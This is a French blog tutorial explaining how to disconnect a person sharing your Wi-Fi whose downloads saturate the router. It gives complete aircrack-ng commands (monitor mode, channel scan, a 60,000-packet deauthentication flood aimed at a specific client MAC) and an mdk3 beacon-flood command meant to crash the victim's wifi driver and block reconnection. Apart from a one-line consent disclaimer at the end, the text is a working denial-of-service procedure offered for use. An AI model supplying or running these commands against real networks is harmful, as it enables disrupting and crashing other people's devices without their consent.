Résultat vous pouvez plus surfer pour que ca revienne dans l'ordre il faut stopper les requêtes vers la box pour qu'elle reprenne un peu d'énergie :D
Donc dans notre scénario, on a un pc connecté en wifi qui est sur emule ou un bittorent etc...
La personne dort paisiblement, avec la box et le pc à coté d'elle, donc on va pas la réveiller pour ca :)
Notre box ne répond presque plus et il faut stopper les requêtes de Johny incessantes
Nous vu que l'on utilise backtrack, on a un driver patché pour l'injection, la suite aircrack-ng et mdk3 :)
C'est juste ce qu'il nous faut.
On place la carte en mode monitor:
- airmon-ng start wlan0
(wlan0 à remplacer par votre carte)
- airodump-ng wlan0
(wlan0 à remplacer par votre carte)
(CTRL+C pour couper airodump-ng)
ici on vient de faire un scann rapide avec airodump-ng, maintenant on connait notre channel, on relance si on a pas la station
airodump-ng -c 11 wlan0
CTRL+C
(-c 11 le cannal, à remplacer par le votre)
maintenant on va balancer des paquets de déconnection (des death) avec aireplay-ng
- aireplay-ng -0 60000 -a 00:06:AB:37:C9:23 -c 00:60:B2:C2:37:24 wlan0
-0
c'est l'option pour les deauth
60000
c'est le nombre de paquets envoyer (n'attendez pas spécialement la fin ;) faites CTRL+C car la c'est réglé pour en balancer un bon paquet quand même)
-a
ca c'est l'adresse mac de la box que l'on retrouve dans notre fenètre airodump-ng colonne BSSID
-c
ca c'est l'adresse mac de la station à kicker (colonne station dans airodump-ng)
wlan0
ca c'est ma carte wifi en mode monitor
Maintenant qu'on vire la personne du réseau, pour bloquer sa reconnexion on va crasher son driver wifi (ca demande une réinitialisation de la carte ou un reboot pour la personne)
On utilise mdk3
- mdk3 wlan0 b -n livebox-007 -g -w -c 11 -s 150
à remplacer par ma carte en mode monitor
b
c'est l'attaque beacon flood mode (c'est ca qui va nous permettre de peut être crasher le driver ou son scanner wifi, et c'est ce que l'on veut à l'origine, donc ca devrait le faire)
-n livebox-007
livebox-007 à remplacer par le SSID que vous voyez dans airodump-ng
-g
ca c'est une option pour les stations en g "54Mbits", ce qui est très très très probable (vous pouvez toute fois ne pas utiliser cette option)
-w
ca c'est si le réseau est en WEP (si il n'y a pas d'encryption ne mettez pas cette option) -t pour du WPA TKIP et -a pour du WPA AES
-c 11
ca c'est le cannal à remplacer par celui que vous voyez dans airodump-ng (colonne CH)
-s 150
ca c'est les paquets par secondes, par défaut c'est 50, vous pouvez ne pas mettre cette option)
Voila bilan, on a aireplay-ng qui tourne en même temps que mdk3, on va les laisser travailler environ 3 à 5 minutes et ca devrait le faire (ATTENTION a ne pas laisser trop longtemps la box peut se crasher aussi sinon)
reconnectez vous et pingez, puis surfez...
tuto crack de clef wep et wpa
tuto mdk3
bien entendu c'est uniquement à tester sur votre matériel ou avec l'accord de la personne
Un problème? Venez en parler sur le forum, tout a une solution :D
0 commentaires:
Enregistrer un commentaire